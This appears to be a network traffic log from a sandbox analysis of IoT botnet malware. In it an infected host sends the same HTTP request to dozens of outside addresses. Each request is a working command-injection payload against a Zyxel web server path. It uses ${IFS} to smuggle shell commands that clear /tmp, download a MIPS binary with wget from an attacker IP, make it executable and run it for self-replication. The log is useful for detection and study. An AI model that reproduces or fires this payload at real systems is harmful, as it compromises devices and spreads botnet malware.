                                        Jan 14, 2024 16:18:36.255672932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2101192.168.2.1340742139.143.60.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255712032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2102192.168.2.1347646189.52.124.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255739927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2103192.168.2.135887663.149.129.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255769014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2104192.168.2.1354270191.22.153.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255824089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2105192.168.2.1355536112.39.42.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255880117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2106192.168.2.1360222158.248.180.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255897999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2107192.168.2.1335110162.61.116.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.255961895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2108192.168.2.134229214.140.22.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256000042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2109192.168.2.1347978166.255.50.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256057978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2110192.168.2.1337754219.97.207.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256069899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2111192.168.2.133948861.155.166.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256104946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2112192.168.2.1348176125.190.75.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256145954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2113192.168.2.133998843.166.204.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256247997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2114192.168.2.1342934135.118.66.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256251097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2115192.168.2.1336128115.128.88.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256273985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2116192.168.2.1353498105.112.71.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256340027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2117192.168.2.1339446129.185.29.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256367922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2118192.168.2.133940814.142.239.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256443024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2119192.168.2.1360496165.170.156.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256459951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2120192.168.2.1355738210.178.124.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256485939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2121192.168.2.1344718165.49.242.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256537914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2122192.168.2.136064862.42.145.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256594896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2123192.168.2.135686418.112.16.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256623983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2124192.168.2.1337776123.239.92.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256679058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2125192.168.2.1342198208.195.105.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256742001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2126192.168.2.1351934201.137.107.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256767988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2127192.168.2.1338132163.8.192.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256807089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2128192.168.2.1342656101.41.169.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256839991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2129192.168.2.1355790151.206.150.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256896019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2130192.168.2.134840236.122.118.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.256989002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2131192.168.2.134022425.95.35.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257034063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2132192.168.2.135458624.18.162.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257039070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2133192.168.2.1348612203.48.105.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257097960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2134192.168.2.1348122194.30.26.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257144928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2135192.168.2.1333746104.70.180.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257159948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2136192.168.2.1346736156.20.81.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257222891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2137192.168.2.134313662.31.100.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257249117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2138192.168.2.1333742169.59.57.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257287979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2139192.168.2.1340974183.44.38.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257344961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2140192.168.2.1340076125.239.68.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257375002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2141192.168.2.135749069.205.19.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257426023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2142192.168.2.1347196143.24.181.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257450104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2143192.168.2.1350632152.49.70.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257503986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2144192.168.2.1353782149.143.186.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257539034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2145192.168.2.134109496.51.102.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257589102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2146192.168.2.1345990110.78.239.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257616043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2147192.168.2.1354028218.9.217.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257682085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2148192.168.2.134432268.251.40.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257682085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2149192.168.2.1337568191.243.43.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257721901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2150192.168.2.13553809.130.184.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257735014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2151192.168.2.1333920199.182.90.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257771015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2152192.168.2.1356188110.84.12.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257838011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2153192.168.2.135876460.178.86.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257914066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2154192.168.2.133557614.84.196.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257925034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2155192.168.2.1358374174.179.157.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257926941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2156192.168.2.1349290208.32.127.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.257967949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2157192.168.2.1337348167.84.150.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258023024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2158192.168.2.1355306104.59.77.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258047104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2159192.168.2.135468440.80.205.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258104086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2160192.168.2.133433052.12.137.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258142948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2161192.168.2.1341702176.212.217.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258189917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2162192.168.2.1342720165.215.4.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:36.258245945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2163192.168.2.133940239.46.24.113443
                                        TimestampBytes transferredDirectionData
